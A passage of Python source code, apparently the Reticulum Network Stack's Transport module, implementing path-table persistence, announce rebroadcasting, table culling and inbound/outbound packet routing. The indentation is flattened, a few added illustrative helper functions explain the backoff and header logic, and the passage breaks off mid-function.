destination_hash = serialised_entry[0]
timestamp = serialised_entry[1]
received_from = serialised_entry[2]
hops = serialised_entry[3]
expires = serialised_entry[4]
random_blobs = serialised_entry[5]
receiving_interface = Transport.find_interface_from_hash(serialised_entry[6])
announce_packet = Transport.get_cached_packet(serialised_entry[7])
if announce_packet != None and receiving_interface != None:
announce_packet.unpack()
# We increase the hops, since reading a packet
# from cache is equivalent to receiving it again
                            # over an interface. It is cached with its non-
# increased hop-count.
announce_packet.hops += 1
Transport.destination_table[destination_hash] = [timestamp, received_from, hops, expires, random_blobs, receiving_interface, announce_packet]
RNS.log("Loaded path table entry for "+RNS.prettyhexrep(destination_hash)+" from storage", RNS.LOG_DEBUG)
else:
RNS.log("Could not reconstruct path table entry from storage for "+RNS.prettyhexrep(destination_hash), RNS.LOG_DEBUG)
if announce_packet == None:
RNS.log("The announce packet could not be loaded from cache", RNS.LOG_DEBUG)
if receiving_interface == None:
RNS.log("The interface is no longer available", RNS.LOG_DEBUG)
if len(Transport.destination_table) == 1:
specifier = "entry"
else:
specifier = "entries"
RNS.log("Loaded "+str(len(Transport.destination_table))+" path table "+specifier+" from storage", RNS.LOG_VERBOSE)
except Exception as e:
RNS.log("Could not load destination table from storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
if os.path.isfile(tunnel_table_path) and not Transport.owner.is_connected_to_shared_instance:
serialised_tunnels = []
try:
file = open(tunnel_table_path, "rb")
serialised_tunnels = umsgpack.unpackb(file.read())
file.close()
for serialised_tunnel in serialised_tunnels:
tunnel_id = serialised_tunnel[0]
interface_hash = serialised_tunnel[1]
serialised_paths = serialised_tunnel[2]
expires = serialised_tunnel[3]
tunnel_paths = {}
for serialised_entry in serialised_paths:
destination_hash = serialised_entry[0]
timestamp = serialised_entry[1]
received_from = serialised_entry[2]
hops = serialised_entry[3]
expires = serialised_entry[4]
random_blobs = serialised_entry[5]
receiving_interface = Transport.find_interface_from_hash(serialised_entry[6])
announce_packet = Transport.get_cached_packet(serialised_entry[7])
if announce_packet != None:
announce_packet.unpack()
# We increase the hops, since reading a packet
# from cache is equivalent to receiving it again
                                # over an interface. It is cached with its non-
# increased hop-count.
announce_packet.hops += 1
tunnel_path = [timestamp, received_from, hops, expires, random_blobs, receiving_interface, announce_packet]
tunnel_paths[destination_hash] = tunnel_path
tunnel = [tunnel_id, None, tunnel_paths, expires]
Transport.tunnels[tunnel_id] = tunnel
if len(Transport.destination_table) == 1:
specifier = "entry"
else:
specifier = "entries"
RNS.log("Loaded "+str(len(Transport.tunnels))+" tunnel table "+specifier+" from storage", RNS.LOG_VERBOSE)
except Exception as e:
RNS.log("Could not load tunnel table from storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
RNS.log("Transport instance "+str(Transport.identity)+" started", RNS.LOG_VERBOSE)
# Synthesize tunnels for any interfaces wanting it
for interface in Transport.interfaces:
interface.tunnel_id = None
if hasattr(interface, "wants_tunnel") and interface.wants_tunnel:
Transport.synthesize_tunnel(interface)
@staticmethod
def jobloop():
while (True):
Transport.jobs()
sleep(Transport.job_interval)
@staticmethod
def jobs():
outgoing = []
Transport.jobs_running = True
try:
if not Transport.jobs_locked:
# Process receipts list for timed-out packets
if time.time() > Transport.receipts_last_checked+Transport.receipts_check_interval:
while len(Transport.receipts) > Transport.MAX_RECEIPTS:
culled_receipt = Transport.receipts.pop(0)
culled_receipt.timeout = -1
culled_receipt.check_timeout()
for receipt in Transport.receipts:
receipt.check_timeout()
if receipt.status != RNS.PacketReceipt.SENT:
Transport.receipts.remove(receipt)
Transport.receipts_last_checked = time.time()
# Process announces needing retransmission
if time.time() > Transport.announces_last_checked+Transport.announces_check_interval:
for destination_hash in Transport.announce_table:
announce_entry = Transport.announce_table[destination_hash]
if announce_entry[2] > Transport.PATHFINDER_R:
RNS.log("Dropping announce for "+RNS.prettyhexrep(destination_hash)+", retries exceeded", RNS.LOG_DEBUG)
Transport.announce_table.pop(destination_hash)
break
else:
if time.time() > announce_entry[1]:
announce_entry[1] = time.time() + math.pow(Transport.PATHFINDER_C, announce_entry[4]) + Transport.PATHFINDER_T + Transport.PATHFINDER_RW
announce_entry[2] += 1
packet = announce_entry[5]
block_rebroadcasts = announce_entry[7]
attached_interface = announce_entry[8]
announce_context = RNS.Packet.NONE
if block_rebroadcasts:
announce_context = RNS.Packet.PATH_RESPONSE
announce_data = packet.data
announce_identity = RNS.Identity.recall(packet.destination_hash)
announce_destination = RNS.Destination(announce_identity, RNS.Destination.OUT, RNS.Destination.SINGLE, "unknown", "unknown");
announce_destination.hash = packet.destination_hash
announce_destination.hexhash = announce_destination.hash.hex()
new_packet = RNS.Packet(
announce_destination,
announce_data,
RNS.Packet.ANNOUNCE,
context = announce_context,
header_type = RNS.Packet.HEADER_2,
transport_type = Transport.TRANSPORT,
transport_id = Transport.identity.hash,
attached_interface = attached_interface
)
new_packet.hops = announce_entry[4]
if block_rebroadcasts:
RNS.log("Rebroadcasting announce as path response for "+RNS.prettyhexrep(announce_destination.hash)+" with hop count "+str(new_packet.hops), RNS.LOG_DEBUG)
else:
RNS.log("Rebroadcasting announce for "+RNS.prettyhexrep(announce_destination.hash)+" with hop count "+str(new_packet.hops), RNS.LOG_DEBUG)
outgoing.append(new_packet)
                                # This handles an edge case where a peer sends a path
                                # request for a destination just after an announce for
                                # said destination has arrived, but before it has been
                                # rebroadcast locally. In such a case the actual announce
                                # is temporarily held, and then reinserted when the path
                                # request has been served to the peer.
if destination_hash in Transport.held_announces:
held_entry = Transport.held_announces.pop(destination_hash)
Transport.announce_table[destination_hash] = held_entry
RNS.log("Reinserting held announce into table", RNS.LOG_DEBUG)
Transport.announces_last_checked = time.time()
# Cull the packet hashlist if it has reached max size
if len(Transport.packet_hashlist) > Transport.hashlist_maxsize:
                    Transport.packet_hashlist = Transport.packet_hashlist[-Transport.hashlist_maxsize:]
if time.time() > Transport.tables_last_culled + Transport.tables_cull_interval:
# Cull the reverse table according to timeout
stale_reverse_entries = []
for truncated_packet_hash in Transport.reverse_table:
reverse_entry = Transport.reverse_table[truncated_packet_hash]
if time.time() > reverse_entry[2] + Transport.REVERSE_TIMEOUT:
stale_reverse_entries.append(truncated_packet_hash)
# Cull the link table according to timeout
stale_links = []
for link_id in Transport.link_table:
link_entry = Transport.link_table[link_id]
if time.time() > link_entry[0] + Transport.LINK_TIMEOUT:
stale_links.append(link_id)
# Cull the path table
stale_paths = []
for destination_hash in Transport.destination_table:
destination_entry = Transport.destination_table[destination_hash]
attached_interface = destination_entry[5]
if time.time() > destination_entry[0] + Transport.DESTINATION_TIMEOUT:
stale_paths.append(destination_hash)
RNS.log("Path to "+RNS.prettyhexrep(destination_hash)+" timed out and was removed", RNS.LOG_DEBUG)
elif not attached_interface in Transport.interfaces:
stale_paths.append(destination_hash)
RNS.log("Path to "+RNS.prettyhexrep(destination_hash)+" was removed since the attached interface no longer exists", RNS.LOG_DEBUG)
# Cull the tunnel table
stale_tunnels = []
ti = 0
for tunnel_id in Transport.tunnels:
tunnel_entry = Transport.tunnels[tunnel_id]
expires = tunnel_entry[3]
if time.time() > expires:
stale_tunnels.append(tunnel_id)
RNS.log("Tunnel "+RNS.prettyhexrep(tunnel_id)+" timed out and was removed", RNS.LOG_DEBUG)
else:
stale_tunnel_paths = []
tunnel_paths = tunnel_entry[2]
for tunnel_path in tunnel_paths:
tunnel_path_entry = tunnel_paths[tunnel_path]
if time.time() > tunnel_path_entry[0] + Transport.DESTINATION_TIMEOUT:
stale_tunnel_paths.append(tunnel_path)
RNS.log("Tunnel path to "+RNS.prettyhexrep(tunnel_path)+" timed out and was removed", RNS.LOG_DEBUG)
for tunnel_path in stale_tunnel_paths:
tunnel_paths.pop(tunnel_path)
ti += 1
if ti > 0:
if ti == 1:
RNS.log("Removed "+str(ti)+" tunnel path", RNS.LOG_DEBUG)
else:
RNS.log("Removed "+str(ti)+" tunnel paths", RNS.LOG_DEBUG)
i = 0
for truncated_packet_hash in stale_reverse_entries:
Transport.reverse_table.pop(truncated_packet_hash)
i += 1
if i > 0:
if i == 1:
RNS.log("Dropped "+str(i)+" reverse table entry", RNS.LOG_DEBUG)
else:
RNS.log("Dropped "+str(i)+" reverse table entries", RNS.LOG_DEBUG)
i = 0
for link_id in stale_links:
Transport.link_table.pop(link_id)
i += 1
if i > 0:
if i == 1:
RNS.log("Dropped "+str(i)+" link", RNS.LOG_DEBUG)
else:
RNS.log("Dropped "+str(i)+" links", RNS.LOG_DEBUG)
i = 0
for destination_hash in stale_paths:
Transport.destination_table.pop(destination_hash)
i += 1
if i > 0:
if i == 1:
RNS.log("Removed "+str(i)+" path", RNS.LOG_DEBUG)
else:
RNS.log("Removed "+str(i)+" paths", RNS.LOG_DEBUG)
i = 0
for tunnel_id in stale_tunnels:
Transport.tunnels.pop(tunnel_id)
i += 1
if i > 0:
if i == 1:
RNS.log("Removed "+str(i)+" tunnel", RNS.LOG_DEBUG)
else:
RNS.log("Removed "+str(i)+" tunnels", RNS.LOG_DEBUG)
Transport.tables_last_culled = time.time()
except Exception as e:
RNS.log("An exception occurred while running Transport jobs.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
traceback.print_exc()
Transport.jobs_running = False
for packet in outgoing:
packet.send()
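    # Illustrative sketch (not part of the original source): the announce
    # retransmission delay computed in jobs() above grows exponentially with
    # the hop count of the queued announce. The constants below are made-up
    # stand-ins for Transport.PATHFINDER_C, PATHFINDER_T and PATHFINDER_RW,
    # chosen only to make the shape of the backoff visible.
    def _example_announce_backoff(hops, base=2.0, grace=10.0, random_window=10.0):
        # Seconds to wait before the next retransmission attempt. With base=2.0
        # this yields 2s at 1 hop, 4s at 2 hops, 8s at 3 hops, plus the fixed
        # grace period and random window.
        return math.pow(base, hops) + grace + random_window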
@staticmethod
def outbound(packet):
while (Transport.jobs_running):
sleep(0.01)
Transport.jobs_locked = True
        # TODO: This update_hash call might be redundant
packet.update_hash()
sent = False
# Check if we have a known path for the destination in the path table
if packet.packet_type != RNS.Packet.ANNOUNCE and packet.destination_hash in Transport.destination_table:
outbound_interface = Transport.destination_table[packet.destination_hash][5]
# If there's more than one hop to the destination, and we know
# a path, we insert the packet into transport by adding the next
# transport nodes address to the header, and modifying the flags.
# This rule applies both for "normal" transport, and when connected
# to a local shared Reticulum instance.
if Transport.destination_table[packet.destination_hash][2] > 1:
if packet.header_type == RNS.Packet.HEADER_1:
# Insert packet into transport
new_flags = (RNS.Packet.HEADER_2) << 6 | (Transport.TRANSPORT) << 4 | (packet.flags & 0b00001111)
new_raw = struct.pack("!B", new_flags)
new_raw += packet.raw[1:2]
new_raw += Transport.destination_table[packet.destination_hash][1]
new_raw += packet.raw[2:]
outbound_interface.processOutgoing(new_raw)
Transport.destination_table[packet.destination_hash][0] = time.time()
sent = True
# In the special case where we are connected to a local shared
# Reticulum instance, and the destination is one hop away, we
# also add transport headers to inject the packet into transport
# via the shared instance. Normally a packet for a destination
# one hop away would just be broadcast directly, but since we
# are "behind" a shared instance, we need to get that instance
# to transport it onto the network.
elif Transport.destination_table[packet.destination_hash][2] == 1 and Transport.owner.is_connected_to_shared_instance:
if packet.header_type == RNS.Packet.HEADER_1:
# Insert packet into transport
new_flags = (RNS.Packet.HEADER_2) << 6 | (Transport.TRANSPORT) << 4 | (packet.flags & 0b00001111)
new_raw = struct.pack("!B", new_flags)
new_raw += packet.raw[1:2]
new_raw += Transport.destination_table[packet.destination_hash][1]
new_raw += packet.raw[2:]
outbound_interface.processOutgoing(new_raw)
Transport.destination_table[packet.destination_hash][0] = time.time()
sent = True
# If none of the above applies, we know the destination is
# directly reachable, and also on which interface, so we
# simply transmit the packet directly on that one.
else:
outbound_interface.processOutgoing(packet.raw)
sent = True
        # If we don't have a known path for the destination, we'll
        # broadcast the packet on all outgoing interfaces, or just
        # the relevant interface if the packet has an attached
        # interface, or belongs to a link.
else:
stored_hash = False
for interface in Transport.interfaces:
if interface.OUT:
should_transmit = True
if packet.destination.type == RNS.Destination.LINK:
if packet.destination.status == RNS.Link.CLOSED:
should_transmit = False
if interface != packet.destination.attached_interface:
should_transmit = False
if packet.attached_interface != None and interface != packet.attached_interface:
should_transmit = False
if should_transmit:
if not stored_hash:
Transport.packet_hashlist.append(packet.packet_hash)
stored_hash = True
interface.processOutgoing(packet.raw)
sent = True
if sent:
packet.sent = True
packet.sent_at = time.time()
# Don't generate receipt if it has been explicitly disabled
if (packet.create_receipt == True and
# Only generate receipts for DATA packets
packet.packet_type == RNS.Packet.DATA and
# Don't generate receipts for PLAIN destinations
packet.destination.type != RNS.Destination.PLAIN and
# Don't generate receipts for link-related packets
not (packet.context >= RNS.Packet.KEEPALIVE and packet.context <= RNS.Packet.LRPROOF) and
# Don't generate receipts for resource packets
not (packet.context >= RNS.Packet.RESOURCE and packet.context <= RNS.Packet.RESOURCE_RCL)):
packet.receipt = RNS.PacketReceipt(packet)
Transport.receipts.append(packet.receipt)
Transport.cache(packet)
Transport.jobs_locked = False
return sent
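    # Illustrative sketch (not part of the original source): the header rewrite
    # used in outbound() above when inserting a packet into transport. The flag
    # byte packs the header type (2 bits), transport type (2 bits) and the low
    # four packet flags; the next-hop transport ID is spliced in directly after
    # the hop-count byte. The header/transport constants are assumed values.
    def _example_insert_transport_header(raw, flags, next_hop_hash):
        header_2 = 0x01        # assumed value of RNS.Packet.HEADER_2
        transport = 0x01       # assumed value of Transport.TRANSPORT
        new_flags = (header_2 << 6) | (transport << 4) | (flags & 0b00001111)
        new_raw = struct.pack("!B", new_flags)
        new_raw += raw[1:2]           # keep the original hop-count byte
        new_raw += next_hop_hash      # insert the next-hop transport ID
        new_raw += raw[2:]            # remainder of the original packet
        return new_raw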
@staticmethod
def packet_filter(packet):
# TODO: Think long and hard about this.
# Is it even strictly necessary with the current
# transport rules?
if packet.context == RNS.Packet.KEEPALIVE:
return True
if packet.context == RNS.Packet.RESOURCE_REQ:
return True
if packet.context == RNS.Packet.RESOURCE_PRF:
return True
if packet.context == RNS.Packet.RESOURCE:
return True
if packet.context == RNS.Packet.CACHE_REQUEST:
return True
if packet.destination_type == RNS.Destination.PLAIN:
return True
if not packet.packet_hash in Transport.packet_hashlist:
return True
else:
if packet.packet_type == RNS.Packet.ANNOUNCE:
return True
RNS.log("Filtered packet with hash "+RNS.prettyhexrep(packet.packet_hash), RNS.LOG_DEBUG)
return False
@staticmethod
def inbound(raw, interface=None):
while (Transport.jobs_running):
sleep(0.01)
Transport.jobs_locked = True
packet = RNS.Packet(None, raw)
packet.unpack()
packet.receiving_interface = interface
packet.hops += 1
if interface != None:
if hasattr(interface, "r_stat_rssi"):
if interface.r_stat_rssi != None:
packet.rssi = interface.r_stat_rssi
if len(Transport.local_client_interfaces) > 0:
Transport.local_client_rssi_cache.append([packet.packet_hash, packet.rssi])
while len(Transport.local_client_rssi_cache) > Transport.LOCAL_CLIENT_CACHE_MAXSIZE:
Transport.local_client_rssi_cache.pop()
if hasattr(interface, "r_stat_snr"):
                if interface.r_stat_snr != None:
packet.snr = interface.r_stat_snr
if len(Transport.local_client_interfaces) > 0:
Transport.local_client_snr_cache.append([packet.packet_hash, packet.snr])
while len(Transport.local_client_snr_cache) > Transport.LOCAL_CLIENT_CACHE_MAXSIZE:
Transport.local_client_snr_cache.pop()
if len(Transport.local_client_interfaces) > 0:
if Transport.is_local_client_interface(interface):
packet.hops -= 1
elif Transport.interface_to_shared_instance(interface):
packet.hops -= 1
if Transport.packet_filter(packet):
Transport.packet_hashlist.append(packet.packet_hash)
Transport.cache(packet)
# Check special conditions for local clients connected
# through a shared Reticulum instance
from_local_client = (packet.receiving_interface in Transport.local_client_interfaces)
for_local_client = (packet.packet_type != RNS.Packet.ANNOUNCE) and (packet.destination_hash in Transport.destination_table and Transport.destination_table[packet.destination_hash][2] == 0)
for_local_client_link = (packet.packet_type != RNS.Packet.ANNOUNCE) and (packet.destination_hash in Transport.link_table and Transport.link_table[packet.destination_hash][4] in Transport.local_client_interfaces)
for_local_client_link |= (packet.packet_type != RNS.Packet.ANNOUNCE) and (packet.destination_hash in Transport.link_table and Transport.link_table[packet.destination_hash][2] in Transport.local_client_interfaces)
proof_for_local_client = (packet.destination_hash in Transport.reverse_table) and (Transport.reverse_table[packet.destination_hash][0] in Transport.local_client_interfaces)
# Plain broadcast packets from local clients are sent
# directly on all attached interfaces, since they are
# never injected into transport.
if not packet.destination_hash in Transport.control_hashes:
if packet.destination_type == RNS.Destination.PLAIN and packet.transport_type == Transport.BROADCAST:
# Send to all interfaces except the originator
if from_local_client:
for interface in Transport.interfaces:
if interface != packet.receiving_interface:
interface.processOutgoing(packet.raw)
# If the packet was not from a local client, send
# it directly to all local clients
else:
for interface in Transport.local_client_interfaces:
interface.processOutgoing(packet.raw)
# General transport handling. Takes care of directing
# packets according to transport tables and recording
# entries in reverse and link tables.
if RNS.Reticulum.transport_enabled() or from_local_client or for_local_client or for_local_client_link:
# If there is no transport id, but the packet is
# for a local client, we generate the transport
# id (it was stripped on the previous hop, since
# we "spoof" the hop count for clients behind a
# shared instance, so they look directly reach-
# able), and reinsert, so the normal transport
# implementation can handle the packet.
if packet.transport_id == None and for_local_client:
packet.transport_id = Transport.identity.hash
                    # If this is a cache request, and we can fulfill
                    # it, do so and stop processing. Otherwise resume
                    # normal processing.
if packet.context == RNS.Packet.CACHE_REQUEST:
if Transport.cache_request_packet(packet):
return
# If the packet is in transport, check whether we
# are the designated next hop, and process it
# accordingly if we are.
if packet.transport_id != None and packet.packet_type != RNS.Packet.ANNOUNCE:
if packet.transport_id == Transport.identity.hash:
if packet.destination_hash in Transport.destination_table:
next_hop = Transport.destination_table[packet.destination_hash][1]
remaining_hops = Transport.destination_table[packet.destination_hash][2]
if remaining_hops > 1:
# Just increase hop count and transmit
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += next_hop
new_raw += packet.raw[12:]
elif remaining_hops == 1:
# Strip transport headers and transmit
new_flags = (RNS.Packet.HEADER_1) << 6 | (Transport.BROADCAST) << 4 | (packet.flags & 0b00001111)
new_raw = struct.pack("!B", new_flags)
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[12:]
elif remaining_hops == 0:
# Just increase hop count and transmit
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
outbound_interface = Transport.destination_table[packet.destination_hash][5]
outbound_interface.processOutgoing(new_raw)
Transport.destination_table[packet.destination_hash][0] = time.time()
if packet.packet_type == RNS.Packet.LINKREQUEST:
# Entry format is
link_entry = [ time.time(), # 0: Timestamp,
next_hop, # 1: Next-hop transport ID
outbound_interface, # 2: Next-hop interface
remaining_hops, # 3: Remaining hops
packet.receiving_interface, # 4: Received on interface
packet.hops, # 5: Taken hops
packet.destination_hash, # 6: Original destination hash
False] # 7: Validated
Transport.link_table[packet.getTruncatedHash()] = link_entry
else:
# Entry format is
reverse_entry = [ packet.receiving_interface, # 0: Received on interface
outbound_interface, # 1: Outbound interface
time.time()] # 2: Timestamp
Transport.reverse_table[packet.getTruncatedHash()] = reverse_entry
else:
# TODO: There should probably be some kind of REJECT
# mechanism here, to signal to the source that their
# expected path failed.
RNS.log("Got packet in transport, but no known path to final destination "+RNS.prettyhexrep(packet.destination_hash)+". Dropping packet.", RNS.LOG_DEBUG)
# Link transport handling. Directs packets according
# to entries in the link tables
if packet.packet_type != RNS.Packet.ANNOUNCE and packet.packet_type != RNS.Packet.LINKREQUEST and packet.context != RNS.Packet.LRPROOF:
if packet.destination_hash in Transport.link_table:
link_entry = Transport.link_table[packet.destination_hash]
                            # If the receiving and outbound interfaces are
                            # the same for this link, direction doesn't
                            # matter, and we simply send the packet on.
outbound_interface = None
if link_entry[2] == link_entry[4]:
                                # But check that taken hops matches one
                                # of the expected values.
if packet.hops == link_entry[3] or packet.hops == link_entry[5]:
outbound_interface = link_entry[2]
else:
# If interfaces differ, we transmit on
# the opposite interface of what the
# packet was received on.
if packet.receiving_interface == link_entry[2]:
# Also check that expected hop count matches
if packet.hops == link_entry[3]:
outbound_interface = link_entry[4]
elif packet.receiving_interface == link_entry[4]:
# Also check that expected hop count matches
if packet.hops == link_entry[5]:
outbound_interface = link_entry[2]
if outbound_interface != None:
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
outbound_interface.processOutgoing(new_raw)
Transport.link_table[packet.destination_hash][0] = time.time()
else:
pass
# Announce handling. Handles logic related to incoming
# announces, queueing rebroadcasts of these, and removal
# of queued announce rebroadcasts once handed to the next node.
if packet.packet_type == RNS.Packet.ANNOUNCE:
local_destination = next((d for d in Transport.destinations if d.hash == packet.destination_hash), None)
if local_destination == None and RNS.Identity.validate_announce(packet):
if packet.transport_id != None:
received_from = packet.transport_id
# Check if this is a next retransmission from
# another node. If it is, we're removing the
# announce in question from our pending table
if RNS.Reticulum.transport_enabled() and packet.destination_hash in Transport.announce_table:
announce_entry = Transport.announce_table[packet.destination_hash]
if packet.hops-1 == announce_entry[4]:
RNS.log("Heard a local rebroadcast of announce for "+RNS.prettyhexrep(packet.destination_hash), RNS.LOG_DEBUG)
announce_entry[6] += 1
if announce_entry[6] >= Transport.LOCAL_REBROADCASTS_MAX:
RNS.log("Max local rebroadcasts of announce for "+RNS.prettyhexrep(packet.destination_hash)+" reached, dropping announce from our table", RNS.LOG_DEBUG)
Transport.announce_table.pop(packet.destination_hash)
if packet.hops-1 == announce_entry[4]+1 and announce_entry[2] > 0:
now = time.time()
if now < announce_entry[1]:
RNS.log("Rebroadcasted announce for "+RNS.prettyhexrep(packet.destination_hash)+" has been passed on to next node, no further tries needed", RNS.LOG_DEBUG)
Transport.announce_table.pop(packet.destination_hash)
else:
received_from = packet.destination_hash
# Check if this announce should be inserted into
# announce and destination tables
should_add = False
# First, check that the announce is not for a destination
# local to this system, and that hops are less than the max
if (not any(packet.destination_hash == d.hash for d in Transport.destinations) and packet.hops < Transport.PATHFINDER_M+1):
random_blob = packet.data[RNS.Identity.KEYSIZE//8:RNS.Identity.KEYSIZE//8+RNS.Reticulum.TRUNCATED_HASHLENGTH//8]
announce_emitted = int.from_bytes(random_blob[5:10], "big")
random_blobs = []
if packet.destination_hash in Transport.destination_table:
random_blobs = Transport.destination_table[packet.destination_hash][4]
# If we already have a path to the announced
# destination, but the hop count is equal or
# less, we'll update our tables.
if packet.hops <= Transport.destination_table[packet.destination_hash][2]:
# Make sure we haven't heard the random
# blob before, so announces can't be
# replayed to forge paths.
# TODO: Check whether this approach works
# under all circumstances
if not random_blob in random_blobs:
should_add = True
else:
should_add = False
else:
# If an announce arrives with a larger hop
# count than we already have in the table,
# ignore it, unless the path is expired, or
# the emission timestamp is more recent.
now = time.time()
path_expires = Transport.destination_table[packet.destination_hash][3]
path_announce_emitted = 0
for path_random_blob in random_blobs:
path_announce_emitted = max(path_announce_emitted, int.from_bytes(path_random_blob[5:10], "big"))
if path_announce_emitted >= announce_emitted:
break
if (now >= path_expires):
# We also check that the announce hash is
# different from ones we've already heard,
# to avoid loops in the network
if not random_blob in random_blobs:
# TODO: Check that this ^ approach actually
# works under all circumstances
RNS.log("Replacing destination table entry for "+str(RNS.prettyhexrep(packet.destination_hash))+" with new announce due to expired path", RNS.LOG_DEBUG)
should_add = True
else:
should_add = False
else:
if (announce_emitted > path_announce_emitted):
if not random_blob in random_blobs:
RNS.log("Replacing destination table entry for "+str(RNS.prettyhexrep(packet.destination_hash))+" with new announce, since it was more recently emitted", RNS.LOG_DEBUG)
should_add = True
else:
should_add = False
else:
# If this destination is unknown in our table
# we should add it
should_add = True
if should_add:
now = time.time()
retries = 0
expires = now + Transport.PATHFINDER_E
announce_hops = packet.hops
local_rebroadcasts = 0
block_rebroadcasts = False
attached_interface = None
retransmit_timeout = now + math.pow(Transport.PATHFINDER_C, packet.hops) + (RNS.rand() * Transport.PATHFINDER_RW)
random_blobs.append(random_blob)
if (RNS.Reticulum.transport_enabled() or Transport.from_local_client(packet)) and packet.context != RNS.Packet.PATH_RESPONSE:
# If the announce is from a local client,
# we announce it immediately, but only one
# time.
if Transport.from_local_client(packet):
retransmit_timeout = now
retries = Transport.PATHFINDER_R
Transport.announce_table[packet.destination_hash] = [
now,
retransmit_timeout,
retries,
received_from,
announce_hops,
packet,
local_rebroadcasts,
block_rebroadcasts,
attached_interface
]
# If we have any local clients connected, we re-
# transmit the announce to them immediately
if (len(Transport.local_client_interfaces)):
announce_identity = RNS.Identity.recall(packet.destination_hash)
announce_destination = RNS.Destination(announce_identity, RNS.Destination.OUT, RNS.Destination.SINGLE, "unknown", "unknown");
announce_destination.hash = packet.destination_hash
announce_destination.hexhash = announce_destination.hash.hex()
announce_context = RNS.Packet.NONE
announce_data = packet.data
if Transport.from_local_client(packet) and packet.context == RNS.Packet.PATH_RESPONSE:
for local_interface in Transport.local_client_interfaces:
if packet.receiving_interface != local_interface:
new_announce = RNS.Packet(
announce_destination,
announce_data,
RNS.Packet.ANNOUNCE,
context = announce_context,
header_type = RNS.Packet.HEADER_2,
transport_type = Transport.TRANSPORT,
transport_id = Transport.identity.hash,
attached_interface = local_interface
)
new_announce.hops = packet.hops
new_announce.send()
else:
for local_interface in Transport.local_client_interfaces:
if packet.receiving_interface != local_interface:
new_announce = RNS.Packet(
announce_destination,
announce_data,
RNS.Packet.ANNOUNCE,
context = announce_context,
header_type = RNS.Packet.HEADER_2,
transport_type = Transport.TRANSPORT,
transport_id = Transport.identity.hash,
attached_interface = local_interface
)
new_announce.hops = packet.hops
new_announce.send()
destination_table_entry = [now, received_from, announce_hops, expires, random_blobs, packet.receiving_interface, packet]
Transport.destination_table[packet.destination_hash] = destination_table_entry
RNS.log("Path to "+RNS.prettyhexrep(packet.destination_hash)+" is now "+str(announce_hops)+" hops away via "+RNS.prettyhexrep(received_from)+" on "+str(packet.receiving_interface), RNS.LOG_VERBOSE)
# If the receiving interface is a tunnel, we add the
# announce to the tunnels table
if hasattr(packet.receiving_interface, "tunnel_id") and packet.receiving_interface.tunnel_id != None:
tunnel_entry = Transport.tunnels[packet.receiving_interface.tunnel_id]
paths = tunnel_entry[2]
paths[packet.destination_hash] = destination_table_entry
expires = time.time() + Transport.DESTINATION_TIMEOUT
tunnel_entry[3] = expires
RNS.log("Path to "+RNS.prettyhexrep(packet.destination_hash)+" associated with tunnel "+RNS.prettyhexrep(packet.receiving_interface.tunnel_id), RNS.LOG_VERBOSE)
# Call externally registered callbacks from apps
# wanting to know when an announce arrives
if packet.context != RNS.Packet.PATH_RESPONSE:
for handler in Transport.announce_handlers:
try:
# Check that the announced destination matches
# the handlers aspect filter
execute_callback = False
if handler.aspect_filter == None:
# If the handlers aspect filter is set to
# None, we execute the callback in all cases
execute_callback = True
else:
announce_identity = RNS.Identity.recall(packet.destination_hash)
handler_expected_hash = RNS.Destination.hash_from_name_and_identity(handler.aspect_filter, announce_identity)
if packet.destination_hash == handler_expected_hash:
execute_callback = True
if execute_callback:
handler.received_announce(
destination_hash=packet.destination_hash,
announced_identity=announce_identity,
app_data=RNS.Identity.recall_app_data(packet.destination_hash)
)
except Exception as e:
RNS.log("Error while processing external announce callback.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
# Handling for linkrequests to local destinations
elif packet.packet_type == RNS.Packet.LINKREQUEST:
for destination in Transport.destinations:
if destination.hash == packet.destination_hash and destination.type == packet.destination_type:
packet.destination = destination
destination.receive(packet)
# Handling for local data packets
elif packet.packet_type == RNS.Packet.DATA:
if packet.destination_type == RNS.Destination.LINK:
for link in Transport.active_links:
if link.link_id == packet.destination_hash:
packet.link = link
link.receive(packet)
else:
for destination in Transport.destinations:
if destination.hash == packet.destination_hash and destination.type == packet.destination_type:
packet.destination = destination
destination.receive(packet)
if destination.proof_strategy == RNS.Destination.PROVE_ALL:
packet.prove()
elif destination.proof_strategy == RNS.Destination.PROVE_APP:
if destination.callbacks.proof_requested:
try:
if destination.callbacks.proof_requested(packet):
packet.prove()
except Exception as e:
RNS.log("Error while executing proof request callback. The contained exception was: "+str(e), RNS.LOG_ERROR)
# Handling for proofs and link-request proofs
elif packet.packet_type == RNS.Packet.PROOF:
if packet.context == RNS.Packet.LRPROOF:
# This is a link request proof, check if it
# needs to be transported
if (RNS.Reticulum.transport_enabled() or for_local_client_link or from_local_client) and packet.destination_hash in Transport.link_table:
link_entry = Transport.link_table[packet.destination_hash]
if packet.receiving_interface == link_entry[2]:
# TODO: Should we validate the LR proof at each transport
# step before transporting it?
RNS.log("Link request proof received on correct interface, transporting it via "+str(link_entry[4]), RNS.LOG_DEBUG)
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
Transport.link_table[packet.destination_hash][7] = True
link_entry[4].processOutgoing(new_raw)
else:
RNS.log("Link request proof received on wrong interface, not transporting it.", RNS.LOG_DEBUG)
else:
# Check if we can deliver it to a local
# pending link
for link in Transport.pending_links:
if link.link_id == packet.destination_hash:
link.validate_proof(packet)
elif packet.context == RNS.Packet.RESOURCE_PRF:
for link in Transport.active_links:
if link.link_id == packet.destination_hash:
link.receive(packet)
else:
if packet.destination_type == RNS.Destination.LINK:
for link in Transport.active_links:
if link.link_id == packet.destination_hash:
packet.link = link
if len(packet.data) == RNS.PacketReceipt.EXPL_LENGTH:
proof_hash = packet.data[:RNS.Identity.HASHLENGTH//8]
else:
proof_hash = None
                    # Check if this proof needs to be transported
if (RNS.Reticulum.transport_enabled() or from_local_client or proof_for_local_client) and packet.destination_hash in Transport.reverse_table:
reverse_entry = Transport.reverse_table.pop(packet.destination_hash)
if packet.receiving_interface == reverse_entry[1]:
